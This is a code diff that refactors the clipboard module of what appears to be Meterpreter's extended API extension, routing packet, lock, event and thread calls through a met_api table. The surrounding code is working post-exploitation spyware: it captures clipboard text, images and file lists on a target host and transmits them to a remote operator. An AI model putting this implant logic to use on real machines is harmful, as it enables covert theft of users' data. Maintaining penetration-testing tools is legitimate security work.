@ -341,21 +342,21 @@ VOID dump_clipboard_capture(Packet* pResponse, ClipboardCapture* pCapture, BOOL
|
|||||||
memset(timestamp, 0, sizeof(timestamp));
|
memset(timestamp, 0, sizeof(timestamp));
|
||||||
|
|
||||||
timestamp_to_string(&pCapture->stCaptureTime, timestamp);
|
timestamp_to_string(&pCapture->stCaptureTime, timestamp);
|
||||||
packet_add_tlv_string(group, TLV_TYPE_EXT_CLIPBOARD_TYPE_TIMESTAMP, timestamp);
|
met_api->packet.add_tlv_string(group, TLV_TYPE_EXT_CLIPBOARD_TYPE_TIMESTAMP, timestamp);
|
||||||
dprintf("[EXTAPI CLIPBOARD] Timestamp added: %s", timestamp);
|
dprintf("[EXTAPI CLIPBOARD] Timestamp added: %s", timestamp);
|
||||||
|
|
||||||
switch (pCapture->captureType)
|
switch (pCapture->captureType)
|
||||||
{
|
{
|
||||||
case CapText:
|
case CapText:
|
||||||
dprintf("[EXTAPI CLIPBOARD] Dumping text %s", pCapture->lpText);
|
dprintf("[EXTAPI CLIPBOARD] Dumping text %s", pCapture->lpText);
|
||||||
packet_add_tlv_string(group, TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT, (PUCHAR)(pCapture->lpText ? pCapture->lpText : "(null - clipboard was cleared)"));
|
met_api->packet.add_tlv_string(group, TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT, (PUCHAR)(pCapture->lpText ? pCapture->lpText : "(null - clipboard was cleared)"));
|
||||||
groupType = TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT;
|
groupType = TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT;
|
||||||
break;
|
break;
|
||||||
case CapImage:
|
case CapImage:
|
||||||
dprintf("[EXTAPI CLIPBOARD] Dumping image %ux%x", pCapture->lpImage->dwWidth, pCapture->lpImage->dwHeight);
|
dprintf("[EXTAPI CLIPBOARD] Dumping image %ux%x", pCapture->lpImage->dwWidth, pCapture->lpImage->dwHeight);
|
||||||
packet_add_tlv_uint(group, TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMX, pCapture->lpImage->dwWidth);
|
met_api->packet.add_tlv_uint(group, TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMX, pCapture->lpImage->dwWidth);
|
||||||
packet_add_tlv_uint(group, TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMY, pCapture->lpImage->dwHeight);
|
met_api->packet.add_tlv_uint(group, TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMY, pCapture->lpImage->dwHeight);
|
||||||
packet_add_tlv_raw(group, TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DATA, pCapture->lpImage->lpImageContent, pCapture->lpImage->dwImageSize);
|
met_api->packet.add_tlv_raw(group, TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DATA, pCapture->lpImage->lpImageContent, pCapture->lpImage->dwImageSize);
|
||||||
groupType = TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG;
|
groupType = TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG;
|
||||||
break;
|
break;
|
||||||
case CapFiles:
|
case CapFiles:
|
||||||
@ -364,16 +365,16 @@ VOID dump_clipboard_capture(Packet* pResponse, ClipboardCapture* pCapture, BOOL
|
|||||||
while (pFile)
|
while (pFile)
|
||||||
{
|
{
|
||||||
dprintf("[EXTAPI CLIPBOARD] Dumping file %p", pFile);
|
dprintf("[EXTAPI CLIPBOARD] Dumping file %p", pFile);
|
||||||
file = packet_create_group();
|
file = met_api->packet.create_group();
|
||||||
|
|
||||||
dprintf("[EXTAPI CLIPBOARD] Adding path %s", pFile->lpPath);
|
dprintf("[EXTAPI CLIPBOARD] Adding path %s", pFile->lpPath);
|
||||||
packet_add_tlv_string(file, TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME, pFile->lpPath);
|
met_api->packet.add_tlv_string(file, TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME, pFile->lpPath);
|
||||||
|
|
||||||
dprintf("[EXTAPI CLIPBOARD] Adding size %llu", pFile->qwSize);
|
dprintf("[EXTAPI CLIPBOARD] Adding size %llu", pFile->qwSize);
|
||||||
packet_add_tlv_qword(file, TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE, pFile->qwSize);
|
met_api->packet.add_tlv_qword(file, TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE, pFile->qwSize);
|
||||||
|
|
||||||
dprintf("[EXTAPI CLIPBOARD] Adding group");
|
dprintf("[EXTAPI CLIPBOARD] Adding group");
|
||||||
packet_add_group(group, TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE, file);
|
met_api->packet.add_group(group, TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE, file);
|
||||||
|
|
||||||
pFile = pFile->pNext;
|
pFile = pFile->pNext;
|
||||||
dprintf("[EXTAPI CLIPBOARD] Moving to next");
|
dprintf("[EXTAPI CLIPBOARD] Moving to next");
|
||||||
@ -382,7 +383,7 @@ VOID dump_clipboard_capture(Packet* pResponse, ClipboardCapture* pCapture, BOOL
|
|||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
|
||||||
packet_add_group(pResponse, groupType, group);
|
met_api->packet.add_group(pResponse, groupType, group);
|
||||||
}
|
}
|
||||||
|
|
||||||
/*!
|
/*!
|
||||||
@ -397,7 +398,7 @@ VOID dump_clipboard_capture_list(Packet* pResponse, ClipboardCaptureList* pCaptu
|
|||||||
{
|
{
|
||||||
ClipboardCapture* pCapture = NULL;
|
ClipboardCapture* pCapture = NULL;
|
||||||
|
|
||||||
lock_acquire(pCaptureList->pClipboardCaptureLock);
|
met_api->lock.acquire(pCaptureList->pClipboardCaptureLock);
|
||||||
pCapture = pCaptureList->pHead;
|
pCapture = pCaptureList->pHead;
|
||||||
while (pCapture)
|
while (pCapture)
|
||||||
{
|
{
|
||||||
@ -409,7 +410,7 @@ VOID dump_clipboard_capture_list(Packet* pResponse, ClipboardCaptureList* pCaptu
|
|||||||
{
|
{
|
||||||
destroy_clipboard_monitor_capture(pCaptureList, FALSE);
|
destroy_clipboard_monitor_capture(pCaptureList, FALSE);
|
||||||
}
|
}
|
||||||
lock_release(pCaptureList->pClipboardCaptureLock);
|
met_api->lock.release(pCaptureList->pClipboardCaptureLock);
|
||||||
}
|
}
|
||||||
|
|
||||||
/*!
|
/*!
|
||||||
@ -429,7 +430,7 @@ BOOL is_duplicate(ClipboardCapture* pNewCapture, ClipboardCaptureList* pList)
|
|||||||
ClipboardFile* pNewFiles = NULL;
|
ClipboardFile* pNewFiles = NULL;
|
||||||
BOOL bResult = FALSE;
|
BOOL bResult = FALSE;
|
||||||
|
|
||||||
lock_acquire(pList->pClipboardCaptureLock);
|
met_api->lock.acquire(pList->pClipboardCaptureLock);
|
||||||
|
|
||||||
do
|
do
|
||||||
{
|
{
|
||||||
@ -501,7 +502,7 @@ BOOL is_duplicate(ClipboardCapture* pNewCapture, ClipboardCaptureList* pList)
|
|||||||
}
|
}
|
||||||
} while (0);
|
} while (0);
|
||||||
|
|
||||||
lock_release(pList->pClipboardCaptureLock);
|
met_api->lock.release(pList->pClipboardCaptureLock);
|
||||||
|
|
||||||
return bResult;
|
return bResult;
|
||||||
}
|
}
|
||||||
@ -520,7 +521,7 @@ BOOL add_clipboard_capture(ClipboardCapture* pNewCapture, ClipboardCaptureList*
|
|||||||
return FALSE;
|
return FALSE;
|
||||||
}
|
}
|
||||||
|
|
||||||
lock_acquire(pList->pClipboardCaptureLock);
|
met_api->lock.acquire(pList->pClipboardCaptureLock);
|
||||||
|
|
||||||
pNewCapture->pNext = NULL;
|
pNewCapture->pNext = NULL;
|
||||||
if (pList->pTail == NULL)
|
if (pList->pTail == NULL)
|
||||||
@ -533,7 +534,7 @@ BOOL add_clipboard_capture(ClipboardCapture* pNewCapture, ClipboardCaptureList*
|
|||||||
pList->pTail = pList->pTail->pNext = pNewCapture;
|
pList->pTail = pList->pTail->pNext = pNewCapture;
|
||||||
}
|
}
|
||||||
pList->dwClipboardDataSize += pNewCapture->dwSize;
|
pList->dwClipboardDataSize += pNewCapture->dwSize;
|
||||||
lock_release(pList->pClipboardCaptureLock);
|
met_api->lock.release(pList->pClipboardCaptureLock);
|
||||||
return TRUE;
|
return TRUE;
|
||||||
}
|
}
|
||||||
|
|
||||||
@ -931,7 +932,7 @@ DWORD request_clipboard_get_data(Remote *remote, Packet *packet)
|
|||||||
DWORD dwResult;
|
DWORD dwResult;
|
||||||
ClipboardCapture* pCapture = NULL;
|
ClipboardCapture* pCapture = NULL;
|
||||||
BOOL bDownload = FALSE;
|
BOOL bDownload = FALSE;
|
||||||
Packet *pResponse = packet_create_response(packet);
|
Packet *pResponse = met_api->packet.create_response(packet);
|
||||||
|
|
||||||
do
|
do
|
||||||
{
|
{
|
||||||
@ -941,7 +942,7 @@ DWORD request_clipboard_get_data(Remote *remote, Packet *packet)
|
|||||||
BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Clipboard failed to initialise, unable to get data");
|
BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Clipboard failed to initialise, unable to get data");
|
||||||
}
|
}
|
||||||
|
|
||||||
bDownload = packet_get_tlv_value_bool(packet, TLV_TYPE_EXT_CLIPBOARD_DOWNLOAD);
|
bDownload = met_api->packet.get_tlv_value_bool(packet, TLV_TYPE_EXT_CLIPBOARD_DOWNLOAD);
|
||||||
|
|
||||||
if ((dwResult = capture_clipboard(bDownload, &pCapture)) != ERROR_SUCCESS)
|
if ((dwResult = capture_clipboard(bDownload, &pCapture)) != ERROR_SUCCESS)
|
||||||
{
|
{
|
||||||
@ -960,7 +961,7 @@ DWORD request_clipboard_get_data(Remote *remote, Packet *packet)
|
|||||||
if (pResponse)
|
if (pResponse)
|
||||||
{
|
{
|
||||||
dprintf("[EXTAPI CLIPBOARD] sending response");
|
dprintf("[EXTAPI CLIPBOARD] sending response");
|
||||||
packet_transmit_response(dwResult, remote, pResponse);
|
met_api->packet.transmit_response(dwResult, remote, pResponse);
|
||||||
}
|
}
|
||||||
|
|
||||||
return dwResult;
|
return dwResult;
|
||||||
@ -993,7 +994,7 @@ DWORD request_clipboard_set_data(Remote *remote, Packet *packet)
|
|||||||
BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Clipboard failed to initialise, unable to get data");
|
BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Clipboard failed to initialise, unable to get data");
|
||||||
}
|
}
|
||||||
|
|
||||||
if ((lpClipString = packet_get_tlv_value_string(packet, TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT)) == NULL)
|
if ((lpClipString = met_api->packet.get_tlv_value_string(packet, TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT)) == NULL)
|
||||||
{
|
{
|
||||||
BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] No string data specified", ERROR_INVALID_PARAMETER);
|
BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] No string data specified", ERROR_INVALID_PARAMETER);
|
||||||
}
|
}
|
||||||
@ -1047,7 +1048,7 @@ DWORD request_clipboard_set_data(Remote *remote, Packet *packet)
|
|||||||
pGlobalFree(hClipboardData);
|
pGlobalFree(hClipboardData);
|
||||||
}
|
}
|
||||||
|
|
||||||
packet_transmit_empty_response(remote, packet, dwResult);
|
met_api->packet.transmit_empty_response(remote, packet, dwResult);
|
||||||
|
|
||||||
return dwResult;
|
return dwResult;
|
||||||
}
|
}
|
||||||
@ -1082,7 +1083,7 @@ DWORD THREADCALL clipboard_monitor_thread_func(THREAD * thread)
|
|||||||
// signal to the caller that our thread has started
|
// signal to the caller that our thread has started
|
||||||
dprintf("[EXTAPI CLIPBOARD] Thread started");
|
dprintf("[EXTAPI CLIPBOARD] Thread started");
|
||||||
pState->bRunning = TRUE;
|
pState->bRunning = TRUE;
|
||||||
event_signal(pState->hResponseEvent);
|
met_api->event.signal(pState->hResponseEvent);
|
||||||
|
|
||||||
waitableHandles[0] = thread->sigterm->handle;
|
waitableHandles[0] = thread->sigterm->handle;
|
||||||
waitableHandles[1] = pState->hPauseEvent->handle;
|
waitableHandles[1] = pState->hPauseEvent->handle;
|
||||||
@ -1106,13 +1107,13 @@ DWORD THREADCALL clipboard_monitor_thread_func(THREAD * thread)
|
|||||||
dprintf("[EXTAPI CLIPBOARD] Thread paused");
|
dprintf("[EXTAPI CLIPBOARD] Thread paused");
|
||||||
pState->bRunning = FALSE;
|
pState->bRunning = FALSE;
|
||||||
// indicate that we've paused
|
// indicate that we've paused
|
||||||
event_signal(pState->hResponseEvent);
|
met_api->event.signal(pState->hResponseEvent);
|
||||||
break;
|
break;
|
||||||
case 2: // resume the thread
|
case 2: // resume the thread
|
||||||
dprintf("[EXTAPI CLIPBOARD] Thread resumed");
|
dprintf("[EXTAPI CLIPBOARD] Thread resumed");
|
||||||
pState->bRunning = TRUE;
|
pState->bRunning = TRUE;
|
||||||
// indicate that we've resumed
|
// indicate that we've resumed
|
||||||
event_signal(pState->hResponseEvent);
|
met_api->event.signal(pState->hResponseEvent);
|
||||||
break;
|
break;
|
||||||
default:
|
default:
|
||||||
// timeout, so pump messages
|
// timeout, so pump messages
|
||||||
@ -1129,7 +1130,7 @@ DWORD THREADCALL clipboard_monitor_thread_func(THREAD * thread)
|
|||||||
// and we're done, switch off, and tell the caller we're done
|
// and we're done, switch off, and tell the caller we're done
|
||||||
pState->bRunning = FALSE;
|
pState->bRunning = FALSE;
|
||||||
destroy_clipboard_monitor_window(pState);
|
destroy_clipboard_monitor_window(pState);
|
||||||
event_signal(pState->hResponseEvent);
|
met_api->event.signal(pState->hResponseEvent);
|
||||||
dprintf("[EXTAPI CLIPBOARD] Thread stopped");
|
dprintf("[EXTAPI CLIPBOARD] Thread stopped");
|
||||||
|
|
||||||
} while (0);
|
} while (0);
|
||||||
@ -1149,19 +1150,19 @@ VOID destroy_clipboard_monitor_state(ClipboardState** ppState)
|
|||||||
ClipboardState* pState = *ppState;
|
ClipboardState* pState = *ppState;
|
||||||
if (pState->hThread != NULL)
|
if (pState->hThread != NULL)
|
||||||
{
|
{
|
||||||
thread_destroy(pState->hThread);
|
met_api->thread.destroy(pState->hThread);
|
||||||
}
|
}
|
||||||
if (pState->hPauseEvent != NULL)
|
if (pState->hPauseEvent != NULL)
|
||||||
{
|
{
|
||||||
event_destroy(pState->hPauseEvent);
|
met_api->event.destroy(pState->hPauseEvent);
|
||||||
}
|
}
|
||||||
if (pState->hResumeEvent != NULL)
|
if (pState->hResumeEvent != NULL)
|
||||||
{
|
{
|
||||||
event_destroy(pState->hResumeEvent);
|
met_api->event.destroy(pState->hResumeEvent);
|
||||||
}
|
}
|
||||||
if (pState->hResponseEvent != NULL)
|
if (pState->hResponseEvent != NULL)
|
||||||
{
|
{
|
||||||
event_destroy(pState->hResponseEvent);
|
met_api->event.destroy(pState->hResponseEvent);
|
||||||
}
|
}
|
||||||
destroy_clipboard_monitor_capture(&pState->captureList, TRUE);
|
destroy_clipboard_monitor_capture(&pState->captureList, TRUE);
|
||||||
|
|
||||||
@ -1206,7 +1207,7 @@ DWORD request_clipboard_monitor_start(Remote *remote, Packet *packet)
|
|||||||
dprintf("[EXTAPI CLIPBOARD] pState %p", pState);
|
dprintf("[EXTAPI CLIPBOARD] pState %p", pState);
|
||||||
memset(pState, 0, sizeof(ClipboardState));
|
memset(pState, 0, sizeof(ClipboardState));
|
||||||
|
|
||||||
lpClassName = packet_get_tlv_value_string(packet, TLV_TYPE_EXT_CLIPBOARD_MON_WIN_CLASS);
|
lpClassName = met_api->packet.get_tlv_value_string(packet, TLV_TYPE_EXT_CLIPBOARD_MON_WIN_CLASS);
|
||||||
if (lpClassName == NULL || strlen(lpClassName) == 0)
|
if (lpClassName == NULL || strlen(lpClassName) == 0)
|
||||||
{
|
{
|
||||||
BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Window class name is missing", ERROR_INVALID_PARAMETER);
|
BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Window class name is missing", ERROR_INVALID_PARAMETER);
|
||||||
@ -1215,12 +1216,12 @@ DWORD request_clipboard_monitor_start(Remote *remote, Packet *packet)
|
|||||||
strncpy_s(pState->cbWindowClass, sizeof(pState->cbWindowClass), lpClassName, sizeof(pState->cbWindowClass) - 1);
|
strncpy_s(pState->cbWindowClass, sizeof(pState->cbWindowClass), lpClassName, sizeof(pState->cbWindowClass) - 1);
|
||||||
dprintf("[EXTAPI CLIPBOARD] Class Name set to %s", pState->cbWindowClass);
|
dprintf("[EXTAPI CLIPBOARD] Class Name set to %s", pState->cbWindowClass);
|
||||||
|
|
||||||
pState->bCaptureImageData = packet_get_tlv_value_bool(packet, TLV_TYPE_EXT_CLIPBOARD_MON_CAP_IMG_DATA);
|
pState->bCaptureImageData = met_api->packet.get_tlv_value_bool(packet, TLV_TYPE_EXT_CLIPBOARD_MON_CAP_IMG_DATA);
|
||||||
|
|
||||||
pState->hPauseEvent = event_create();
|
pState->hPauseEvent = met_api->event.create();
|
||||||
pState->hResumeEvent = event_create();
|
pState->hResumeEvent = met_api->event.create();
|
||||||
pState->hResponseEvent = event_create();
|
pState->hResponseEvent = met_api->event.create();
|
||||||
pState->captureList.pClipboardCaptureLock = lock_create();
|
pState->captureList.pClipboardCaptureLock = met_api->lock.create();
|
||||||
|
|
||||||
if (pState->hPauseEvent == NULL
|
if (pState->hPauseEvent == NULL
|
||||||
|| pState->hResumeEvent == NULL
|
|| pState->hResumeEvent == NULL
|
||||||
@ -1229,7 +1230,7 @@ DWORD request_clipboard_monitor_start(Remote *remote, Packet *packet)
|
|||||||
BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Unable to allocate memory for clipboard events", ERROR_NOT_ENOUGH_MEMORY);
|
BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Unable to allocate memory for clipboard events", ERROR_NOT_ENOUGH_MEMORY);
|
||||||
}
|
}
|
||||||
|
|
||||||
pState->hThread = thread_create((THREADFUNK)clipboard_monitor_thread_func, pState, NULL, NULL);
|
pState->hThread = met_api->thread.create((THREADFUNK)clipboard_monitor_thread_func, pState, NULL, NULL);
|
||||||
|
|
||||||
if (pState->hThread == NULL)
|
if (pState->hThread == NULL)
|
||||||
{
|
{
|
||||||
@ -1237,10 +1238,10 @@ DWORD request_clipboard_monitor_start(Remote *remote, Packet *packet)
|
|||||||
}
|
}
|
||||||
|
|
||||||
gClipboardState = pState;
|
gClipboardState = pState;
|
||||||
thread_run(pState->hThread);
|
met_api->thread.run(pState->hThread);
|
||||||
|
|
||||||
// 4 seconds should be long enough for the thread to indicate it's started, if not, bomb out
|
// 4 seconds should be long enough for the thread to indicate it's started, if not, bomb out
|
||||||
if (!event_poll(pState->hResponseEvent, 4000))
|
if (!met_api->event.poll(pState->hResponseEvent, 4000))
|
||||||
{
|
{
|
||||||
BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Thread failed to start correctly", ERROR_ABANDONED_WAIT_0);
|
BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Thread failed to start correctly", ERROR_ABANDONED_WAIT_0);
|
||||||
}
|
}
|
||||||
@ -1262,7 +1263,7 @@ DWORD request_clipboard_monitor_start(Remote *remote, Packet *packet)
|
|||||||
gClipboardState = NULL;
|
gClipboardState = NULL;
|
||||||
}
|
}
|
||||||
|
|
||||||
packet_transmit_empty_response(remote, packet, dwResult);
|
met_api->packet.transmit_empty_response(remote, packet, dwResult);
|
||||||
|
|
||||||
return dwResult;
|
return dwResult;
|
||||||
}
|
}
|
||||||
@ -1276,8 +1277,8 @@ DWORD clipboard_monitor_pause(ClipboardState* pState)
|
|||||||
{
|
{
|
||||||
if (pState->bRunning)
|
if (pState->bRunning)
|
||||||
{
|
{
|
||||||
event_signal(pState->hPauseEvent);
|
met_api->event.signal(pState->hPauseEvent);
|
||||||
event_poll(pState->hResponseEvent, INFINITE);
|
met_api->event.poll(pState->hResponseEvent, INFINITE);
|
||||||
}
|
}
|
||||||
|
|
||||||
return ERROR_SUCCESS;
|
return ERROR_SUCCESS;
|
||||||
@ -1292,8 +1293,8 @@ DWORD clipboard_monitor_resume(ClipboardState* pState)
|
|||||||
{
|
{
|
||||||
if (!pState->bRunning)
|
if (!pState->bRunning)
|
||||||
{
|
{
|
||||||
event_signal(pState->hResumeEvent);
|
met_api->event.signal(pState->hResumeEvent);
|
||||||
event_poll(pState->hResponseEvent, INFINITE);
|
met_api->event.poll(pState->hResponseEvent, INFINITE);
|
||||||
}
|
}
|
||||||
|
|
||||||
return ERROR_SUCCESS;
|
return ERROR_SUCCESS;
|
||||||
@ -1321,7 +1322,7 @@ DWORD request_clipboard_monitor_pause(Remote *remote, Packet *packet)
|
|||||||
dwResult = clipboard_monitor_pause(gClipboardState);
|
dwResult = clipboard_monitor_pause(gClipboardState);
|
||||||
} while (0);
|
} while (0);
|
||||||
|
|
||||||
packet_transmit_empty_response(remote, packet, dwResult);
|
met_api->packet.transmit_empty_response(remote, packet, dwResult);
|
||||||
|
|
||||||
return dwResult;
|
return dwResult;
|
||||||
}
|
}
|
||||||
@ -1348,7 +1349,7 @@ DWORD request_clipboard_monitor_resume(Remote *remote, Packet *packet)
|
|||||||
dwResult = clipboard_monitor_resume(gClipboardState);
|
dwResult = clipboard_monitor_resume(gClipboardState);
|
||||||
} while (0);
|
} while (0);
|
||||||
|
|
||||||
packet_transmit_empty_response(remote, packet, dwResult);
|
met_api->packet.transmit_empty_response(remote, packet, dwResult);
|
||||||
|
|
||||||
return dwResult;
|
return dwResult;
|
||||||
}
|
}
|
||||||
@ -1364,7 +1365,7 @@ DWORD request_clipboard_monitor_stop(Remote *remote, Packet *packet)
|
|||||||
DWORD dwResult = ERROR_SUCCESS;
|
DWORD dwResult = ERROR_SUCCESS;
|
||||||
BOOL bDump = TRUE;
|
BOOL bDump = TRUE;
|
||||||
BOOL bIncludeImages = TRUE;
|
BOOL bIncludeImages = TRUE;
|
||||||
Packet *pResponse = packet_create_response(packet);
|
Packet *pResponse = met_api->packet.create_response(packet);
|
||||||
|
|
||||||
do
|
do
|
||||||
{
|
{
|
||||||
@ -1374,18 +1375,18 @@ DWORD request_clipboard_monitor_stop(Remote *remote, Packet *packet)
|
|||||||
}
|
}
|
||||||
|
|
||||||
dprintf("[EXTAPI CLIPBOARD] Stopping clipboard monitor");
|
dprintf("[EXTAPI CLIPBOARD] Stopping clipboard monitor");
|
||||||
bDump = packet_get_tlv_value_bool(packet, TLV_TYPE_EXT_CLIPBOARD_MON_DUMP);
|
bDump = met_api->packet.get_tlv_value_bool(packet, TLV_TYPE_EXT_CLIPBOARD_MON_DUMP);
|
||||||
bIncludeImages = packet_get_tlv_value_bool(packet, TLV_TYPE_EXT_CLIPBOARD_MON_CAP_IMG_DATA);
|
bIncludeImages = met_api->packet.get_tlv_value_bool(packet, TLV_TYPE_EXT_CLIPBOARD_MON_CAP_IMG_DATA);
|
||||||
|
|
||||||
// now stop the show
|
// now stop the show
|
||||||
event_signal(gClipboardState->hThread->sigterm);
|
met_api->event.signal(gClipboardState->hThread->sigterm);
|
||||||
|
|
||||||
// if they don't terminate in a reasonable period of time...
|
// if they don't terminate in a reasonable period of time...
|
||||||
if (!event_poll(gClipboardState->hResponseEvent, 10000))
|
if (!met_api->event.poll(gClipboardState->hResponseEvent, 10000))
|
||||||
{
|
{
|
||||||
// ... FINISH HIM!
|
// ... FINISH HIM!
|
||||||
dprintf("[EXTAPI CLIPBOARD] Brutally terminating the thread for not responding fast enough");
|
dprintf("[EXTAPI CLIPBOARD] Brutally terminating the thread for not responding fast enough");
|
||||||
thread_kill(gClipboardState->hThread);
|
met_api->thread.kill(gClipboardState->hThread);
|
||||||
}
|
}
|
||||||
|
|
||||||
if (bDump)
|
if (bDump)
|
||||||
@ -1397,7 +1398,7 @@ DWORD request_clipboard_monitor_stop(Remote *remote, Packet *packet)
|
|||||||
dwResult = ERROR_SUCCESS;
|
dwResult = ERROR_SUCCESS;
|
||||||
} while (0);
|
} while (0);
|
||||||
|
|
||||||
packet_transmit_response(dwResult, remote, pResponse);
|
met_api->packet.transmit_response(dwResult, remote, pResponse);
|
||||||
|
|
||||||
return dwResult;
|
return dwResult;
|
||||||
}
|
}
|
||||||
@ -1413,7 +1414,7 @@ DWORD request_clipboard_monitor_dump(Remote *remote, Packet *packet)
|
|||||||
DWORD dwResult = ERROR_SUCCESS;
|
DWORD dwResult = ERROR_SUCCESS;
|
||||||
BOOL bIncludeImages = TRUE;
|
BOOL bIncludeImages = TRUE;
|
||||||
BOOL bPurge = TRUE;
|
BOOL bPurge = TRUE;
|
||||||
Packet *pResponse = packet_create_response(packet);
|
Packet *pResponse = met_api->packet.create_response(packet);
|
||||||
|
|
||||||
do
|
do
|
||||||
{
|
{
|
||||||
@ -1421,8 +1422,8 @@ DWORD request_clipboard_monitor_dump(Remote *remote, Packet *packet)
|
|||||||
{
|
{
|
||||||
BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Monitor thread isn't running", ERROR_NOT_CAPABLE);
|
BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Monitor thread isn't running", ERROR_NOT_CAPABLE);
|
||||||
}
|
}
|
||||||
bIncludeImages = packet_get_tlv_value_bool(packet, TLV_TYPE_EXT_CLIPBOARD_MON_CAP_IMG_DATA);
|
bIncludeImages = met_api->packet.get_tlv_value_bool(packet, TLV_TYPE_EXT_CLIPBOARD_MON_CAP_IMG_DATA);
|
||||||
bPurge = packet_get_tlv_value_bool(packet, TLV_TYPE_EXT_CLIPBOARD_MON_PURGE);
|
bPurge = met_api->packet.get_tlv_value_bool(packet, TLV_TYPE_EXT_CLIPBOARD_MON_PURGE);
|
||||||
|
|
||||||
dprintf("[EXTAPI CLIPBOARD] Purging? %s", bPurge ? "TRUE" : "FALSE");
|
dprintf("[EXTAPI CLIPBOARD] Purging? %s", bPurge ? "TRUE" : "FALSE");
|
||||||
|
|
||||||
@ -1430,15 +1431,15 @@ DWORD request_clipboard_monitor_dump(Remote *remote, Packet *packet)
|
|||||||
|
|
||||||
if (bPurge)
|
if (bPurge)
|
||||||
{
|
{
|
||||||
lock_acquire(gClipboardState->captureList.pClipboardCaptureLock);
|
met_api->lock.acquire(gClipboardState->captureList.pClipboardCaptureLock);
|
||||||
destroy_clipboard_monitor_capture(&gClipboardState->captureList, FALSE);
|
destroy_clipboard_monitor_capture(&gClipboardState->captureList, FALSE);
|
||||||
lock_release(gClipboardState->captureList.pClipboardCaptureLock);
|
met_api->lock.release(gClipboardState->captureList.pClipboardCaptureLock);
|
||||||
}
|
}
|
||||||
|
|
||||||
dwResult = ERROR_SUCCESS;
|
dwResult = ERROR_SUCCESS;
|
||||||
} while (0);
|
} while (0);
|
||||||
|
|
||||||
packet_transmit_response(dwResult, remote, pResponse);
|
met_api->packet.transmit_response(dwResult, remote, pResponse);
|
||||||
|
|
||||||
return dwResult;
|
return dwResult;
|
||||||
}
|
}
|
||||||
@ -1454,7 +1455,7 @@ DWORD request_clipboard_monitor_purge(Remote *remote, Packet *packet)
|
|||||||
DWORD dwResult = ERROR_SUCCESS;
|
DWORD dwResult = ERROR_SUCCESS;
|
||||||
BOOL bIncludeImages = TRUE;
|
BOOL bIncludeImages = TRUE;
|
||||||
BOOL bPurge = TRUE;
|
BOOL bPurge = TRUE;
|
||||||
Packet *pResponse = packet_create_response(packet);
|
Packet *pResponse = met_api->packet.create_response(packet);
|
||||||
|
|
||||||
do
|
do
|
||||||
{
|
{
|
||||||
@ -1463,14 +1464,14 @@ DWORD request_clipboard_monitor_purge(Remote *remote, Packet *packet)
|
|||||||
BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Monitor thread isn't running", ERROR_NOT_CAPABLE);
|
BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Monitor thread isn't running", ERROR_NOT_CAPABLE);
|
||||||
}
|
}
|
||||||
|
|
||||||
lock_acquire(gClipboardState->captureList.pClipboardCaptureLock);
|
met_api->lock.acquire(gClipboardState->captureList.pClipboardCaptureLock);
|
||||||
destroy_clipboard_monitor_capture(&gClipboardState->captureList, FALSE);
|
destroy_clipboard_monitor_capture(&gClipboardState->captureList, FALSE);
|
||||||
lock_release(gClipboardState->captureList.pClipboardCaptureLock);
|
met_api->lock.release(gClipboardState->captureList.pClipboardCaptureLock);
|
||||||
|
|
||||||
dwResult = ERROR_SUCCESS;
|
dwResult = ERROR_SUCCESS;
|
||||||
} while (0);
|
} while (0);
|
||||||
|
|
||||||
packet_transmit_response(dwResult, remote, pResponse);
|
met_api->packet.transmit_response(dwResult, remote, pResponse);
|
||||||
|
|
||||||
return dwResult;
|
return dwResult;
|
||||||
}
|
}
|
||||||
|
|||||||
@ -2,12 +2,13 @@
|
|||||||
* @file extapi.h
|
* @file extapi.h
|
||||||
* @brief Entry point and intialisation definitions for the extended API extension.
|
* @brief Entry point and intialisation definitions for the extended API extension.
|
||||||
*/
|
*/
|
||||||
#include "../../common/common.h"
|
#include "common.h"
|
||||||
|
|
||||||
|
#include "common_metapi.h"
|
||||||
|
|
||||||
|
// Required so that use of the API works.
|
||||||
|
MetApi* met_api = NULL;
|
||||||
|
|
||||||
#include "../../DelayLoadMetSrv/DelayLoadMetSrv.h"
|
|
||||||
// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
|
|
||||||
// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
|
|
||||||
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
|
|
||||||
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
|
